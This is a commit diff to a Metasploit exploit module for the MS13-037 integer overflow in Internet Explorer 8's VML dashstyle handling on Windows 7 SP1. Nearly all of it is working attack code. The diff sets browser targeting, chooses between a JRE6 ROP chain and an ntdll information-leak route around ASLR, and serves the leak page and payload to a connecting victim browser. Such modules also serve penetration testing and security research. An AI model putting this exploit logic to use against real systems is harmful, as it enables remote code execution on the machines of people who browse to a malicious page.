Working version after the upgrade

Author: wchen-r7

modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb

@@ -28,18 +28,25 @@ def initialize(info={})
       'Description'    => %q{
           This module exploits an integer overflow vulnerability on Internet Explorer.
         The vulnerability exists in the handling of the dashstyle.array length for vml
-        shapes on the vgx.dll module. This module has been tested successfully on Windows 7
-        SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target
-        to use an info leak to disclose the ntdll.dll base address is provided. This target
-        requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1
-        installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).
+        shapes on the vgx.dll module.
+
+          This module has been built and tested specifically against Windows 7 SP1 with
+        Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to
+        bypass ASLR, and by default the info leak is used. The ntdll version should be
+        either v6.1.7601.17514 (the default dll version on a newly installed/unpatched
+        Windows 7 SP1), or ntdll.dll v6.1.7601.17725 (installed after apply MS12-001).
+
+          If you wish to try the JRE6 component instead to bypass ASLR, you can set the
+        advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't
+        have this particular component, the exploit will refuse the attack.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'Nicolas Joly', # Vulnerability discovery, PoC and analysis
-          '4B5F5F4B', # PoC
-          'juan vazquez' # Metasploit module
+          '4B5F5F4B',     # PoC
+          'juan vazquez', # Metasploit module
+          'sinn3r'        # BES upgrade
         ],
       'References'     =>
         [
@@ -61,10 +68,11 @@ def initialize(info={})
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
       'BrowserRequirements' =>
         {
           :source => /script/i,
-          :os_name => OperatingSystems::WINDOWS,
+          :os_name => OperatingSystems::Match::WINDOWS_7,
           :ua_name => HttpClients::IE,
           :ua_ver  => '8.0',
         },
@@ -181,10 +189,10 @@ def get_ntdll_rop
   def get_payload(t, cli)
     code = payload.encoded
     # No rop. Just return the payload.
-    return code if t['Rop'].nil?
+    return code if t.opts['Rop'].nil?
 
     # Both ROP chains generated by mona.py - See corelan.be
-    case t['Rop']
+    case t.opts['Rop']
     when :jre
       print_status("Using JRE ROP")
       stack_pivot = [
@@ -363,13 +371,13 @@ def html_info_leak
   def set_rop(t, rop, info)
     case rop
     when /^ntdll$/i
-      t['Rop'] = :ntdll
+      t.opts['Rop'] = :ntdll
     when /^jre6$/i
       if info[:java] !~ /1\.6|6\.0/
-        raise RuntimeError, "Target does not have the suitable Java component installed for our attack"
+        raise RuntimeError, "Target does not have the suitable Java component (1.6) installed for our attack"
       end
 
-      t['Rop'] = :jre
+      t.opts['Rop'] = :jre
     end
 
     return t
@@ -379,11 +387,12 @@ def on_request_exploit(cli, request, target_info)
     begin
       my_target = set_rop(get_target, datastore['ROP'], target_info)
     rescue RuntimeError => e
-      print_error(e.message)
+      # This one is just a warning, because it's a requirement check so it's not that scary.
+      print_warning(e.message)
       return
     end
 
-    if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
+    if my_target.opts['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
       html = html_info_leak
       print_status("Sending HTML to info leak...")
       send_response(cli, html, {'Content-Type'=>'text/html'})